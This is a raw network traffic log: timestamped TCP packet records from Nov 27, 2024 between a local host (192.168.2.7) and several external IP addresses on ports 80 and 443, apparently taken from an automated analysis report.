                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.284017086 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.284296036 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.284400940 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.284460068 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.285315990 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.285348892 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.285407066 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.286320925 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.286334991 CET4434982218.165.220.110192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.286361933 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.286412001 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.286451101 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.286545992 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.286576986 CET4434982218.165.220.110192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.287328005 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.287380934 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.287462950 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.287518978 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.287571907 CET4434982218.165.220.110192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.287662983 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.288332939 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.288382053 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.288454056 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.288496971 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.288594007 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.288655043 CET4434982218.165.220.110192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.289351940 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.289383888 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.289439917 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.290348053 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.290400982 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.290442944 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.290482044 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.291337967 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.291393042 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.291443110 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.291482925 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.292351007 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.292403936 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.292453051 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.293329000 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.293416023 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.293437004 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.293454885 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.293590069 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.293795109 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.293802023 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.294342041 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.294471979 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.294533014 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.295341015 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.295447111 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.295497894 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.296374083 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.296453953 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.296509027 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.297414064 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.297462940 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.297462940 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.297683954 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.298415899 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.298472881 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.298849106 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.298969030 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.299614906 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.299631119 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.299669027 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.299685001 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.300369024 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.300463915 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.300522089 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.301372051 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.301425934 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.301475048 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.301518917 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.302369118 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.302414894 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.302423954 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.302618027 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.303431034 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.303448915 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.303508997 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.304383993 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.304450035 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.304510117 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.304549932 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.305377007 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.305489063 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.305538893 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.306303024 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.306360960 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.306397915 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.306411028 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.306411028 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.306462049 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.307406902 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.307456017 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.307517052 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.308470011 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.308492899 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.308526993 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.308547974 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.309393883 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.309508085 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.309566975 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.310400009 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.310499907 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.310553074 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.311366081 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.311413050 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.319890022 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.319948912 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.319962978 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.333760977 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.333843946 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.333853006 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.337753057 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.337764025 CET4434982218.165.220.110192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.360616922 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.384222031 CET49822443192.168.2.718.165.220.110
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.384238005 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.388242960 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.392530918 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.392644882 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.392654896 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.396842957 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.396933079 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397027016 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397211075 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397211075 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397231102 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397239923 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397646904 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397712946 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.397942066 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.398659945 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.398674965 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.398685932 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.398691893 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.402391911 CET4434982920.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.403656960 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.403688908 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.403779030 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.405170918 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.405208111 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.405278921 CET49837443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.405292034 CET4434983713.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.405328989 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.405755043 CET49829443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.405769110 CET4434982920.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.406524897 CET49838443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.406534910 CET4434983813.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.406857967 CET49829443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.406862020 CET4434982920.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.406918049 CET49829443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.406927109 CET4434982920.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.430578947 CET4434982720.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.430676937 CET49827443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.441504002 CET49827443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.441555023 CET4434982720.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.441782951 CET4434982720.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.442478895 CET49827443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.442841053 CET49827443192.168.2.720.231.128.67
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.442873001 CET4434982720.231.128.67192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.447772026 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.447782993 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.452316046 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.452389956 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.452470064 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.452714920 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.452714920 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.452728987 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.452739000 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.455698967 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.455776930 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.455821991 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.456619978 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.456628084 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.456648111 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.456651926 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.456774950 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.456789970 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.456887960 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.457443953 CET49839443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.457458973 CET4434983913.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.458782911 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.458808899 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.458865881 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.458972931 CET49840443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.458987951 CET4434984013.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.473012924 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.473119020 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.473268032 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.473280907 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.473661900 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.480180979 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.480470896 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.486763000 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.486888885 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.486897945 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.497906923 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.498023987 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.498034954 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.506300926 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.506485939 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.506496906 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.518497944 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.518588066 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.518596888 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.532205105 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.532268047 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.532277107 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.545691967 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.545906067 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.545913935 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.558615923 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.558710098 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.558726072 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.572835922 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.572879076 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.572886944 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.584805012 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.584861040 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.584881067 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.596491098 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.596631050 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.596640110 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.608359098 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.608531952 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.608540058 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.620093107 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.620178938 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.620187998 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.643918037 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.643978119 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.643986940 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.646071911 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.646157026 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.646163940 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.670779943 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.670841932 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.670850039 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.672949076 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.673038006 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.673043966 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.677315950 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.677392960 CET49805443192.168.2.7172.217.19.225
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.677401066 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.681037903 CET44349805172.217.19.225192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.681099892 CET49805443192.168.2.7172.217.19.225
